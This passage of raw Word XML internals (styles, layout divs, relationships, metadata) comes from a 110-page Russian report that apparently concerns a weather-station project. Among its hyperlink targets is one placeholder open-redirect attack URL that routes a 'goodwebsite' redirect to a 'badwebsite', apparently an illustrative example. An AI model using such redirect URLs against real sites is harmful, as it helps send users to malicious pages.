      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="atn">
    <w:name w:val="atn"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00C368DE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="atv">
    <w:name w:val="atv"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00C368DE"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="22">
    <w:name w:val="Quote"/>
    <w:aliases w:val="code"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="23"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:rsid w:val="004A1170"/>
    <w:pPr>
      <w:ind w:left="862" w:right="862"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="23">
    <w:name w:val="Цитата 2 Знак"/>
    <w:aliases w:val="code Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="22"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="004A1170"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>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720"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="106"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="17">
          <w:marLeft w:val="720"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="106"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="27">
          <w:marLeft w:val="720"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="106"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="31">
          <w:marLeft w:val="720"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="106"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="35">
          <w:marLeft w:val="720"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="106"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>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sChild>
        <w:div w:id="6">
          <w:marLeft w:val="288"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="101"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="23">
          <w:marLeft w:val="288"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="101"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="19">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sChild>
        <w:div w:id="3">
          <w:marLeft w:val="720"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="106"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="8">
          <w:marLeft w:val="720"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="106"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="16">
          <w:marLeft w:val="720"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="106"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="28">
          <w:marLeft w:val="720"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="106"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="36">
          <w:marLeft w:val="720"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="106"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="32">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="33">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sChild>
        <w:div w:id="5">
          <w:marLeft w:val="288"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="77"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="7">
          <w:marLeft w:val="288"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="77"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="9">
          <w:marLeft w:val="288"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="77"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="18">
          <w:marLeft w:val="288"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="77"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="21">
          <w:marLeft w:val="288"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="77"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="26">
          <w:marLeft w:val="288"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="77"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="29">
          <w:marLeft w:val="288"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="77"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="30">
          <w:marLeft w:val="288"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="77"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="39">
          <w:marLeft w:val="288"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="77"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="37">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="40">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="4">
          <w:marLeft w:val="720"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="106"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="10">
          <w:marLeft w:val="720"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="106"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="11">
          <w:marLeft w:val="720"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="106"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="12">
          <w:marLeft w:val="720"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="106"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="38">
          <w:marLeft w:val="720"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="106"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="347410591">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="506405638">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="960264343">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1026295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9.png"/><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51.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kradunches/ari-metiostation" TargetMode="Externa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7.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/comments" Target="comments.xml"/><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emf"/><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image" Target="media/image54.png"/><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9.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><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image" Target="media/image55.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png"/><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emf"/><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hyperlink" Target="http://www.goodwebsite.com/Redirect?url=http://www.badwebsite.com" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><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hyperlink" Target="https://function-x.ru/statistics_dispersion_analysis.html"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 Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject1.bin"/><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wmf"/><Relationship Id="rId13" Type="http://schemas.microsoft.com/office/2016/09/relationships/commentsIds" Target="commentsIds.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.jpeg"/><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 Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dx.doi.org/10.1080/01621459.1952.10483441"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DEC155-9E3C-480B-89A9-96DEFEF133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3</TotalTime>
  <Pages>110</Pages>
  <Words>21877</Words>
  <Characters>124700</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>1039</Lines>
  <Paragraphs>292</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="2" baseType="variant">
      <vt:variant>
        <vt:lpstr>Название</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="1" baseType="lpstr">
      <vt:lpstr>РЕФЕРАТ</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>SPecialiST RePack</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>146285</CharactersWithSpaces>
  <SharedDoc>false</SharedDoc>
  <HLinks>
    <vt:vector size="168" baseType="variant">
      <vt:variant>
        <vt:i4>4325454</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>225</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://dx.doi.org/10.1080/01621459.1952.10483441</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7995440</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>222</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://function-x.ru/statistics_dispersion_analysis.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7077946</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>219</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://github.com/kradunches/ari-metiostation</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1966132</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>146</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc161568224</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1966132</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>140</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc161568223</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1966132</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>134</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc161568222</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1966132</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>128</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc161568221</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1966132</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>122</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc161568220</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1900596</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>116</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc161568219</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1900596</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>110</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc161568218</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1900596</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>104</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc161568217</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1900596</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>98</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc161568216</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1900596</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>92</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc161568215</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1900596</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>86</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc161568214</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1900596</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>80</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc161568213</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1900596</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>74</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc161568212</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1900596</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>68</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc161568211</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1900596</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>62</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc161568210</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1835060</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>56</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc161568209</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1835060</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>50</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc161568208</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1835060</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>44</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc161568207</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1835060</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>38</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
